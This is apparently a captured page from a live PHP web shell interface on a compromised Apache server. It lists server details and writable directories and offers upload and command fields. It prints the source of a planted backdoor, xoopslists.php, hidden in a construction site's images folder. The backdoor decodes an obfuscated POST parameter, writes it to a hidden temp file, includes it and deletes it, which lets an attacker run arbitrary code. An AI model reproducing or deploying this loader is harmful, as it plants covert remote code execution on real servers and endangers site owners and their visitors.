403Webshell
Server IP : 65.108.144.40  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : dev ( 1000)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/Solum-construction/demo-job/images/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/Solum-construction/demo-job/images/xoopslists.php
<?php

if(filter_has_var(INPUT_POST, "\x63\x6Fmp")){
	$ent = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), getcwd(), "/var/tmp", getenv("TEMP"), sys_get_temp_dir(), "/tmp"]);
	$descriptor = $_POST["\x63\x6Fmp"];
		$descriptor	=explode			( 	".",   $descriptor			)			;	 
	$dchunk = '';
            $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($s6);
            $__len = count($descriptor);
    
            for ($u = 0; $u		<$__len; $u++) {$v1 = $descriptor[$u];
                $chS = ord($s6[$u  %		$lenS]);
                $dec = ((int)$v1 - $chS - ($u  %		10)) ^ 70;
                $dchunk .= chr($dec);}
	while ($symbol = array_shift($ent)) {
    		if ((is_dir($symbol) and is_writable($symbol))) {
    $ptr = sprintf("%s/.token", $symbol);
    $success = file_put_contents($ptr, $dchunk);
if ($success) {
	include $ptr;
	@unlink($ptr);
	exit;}
}
}
}

Youez - 2016 - github.com/yon3zu
LinuXploit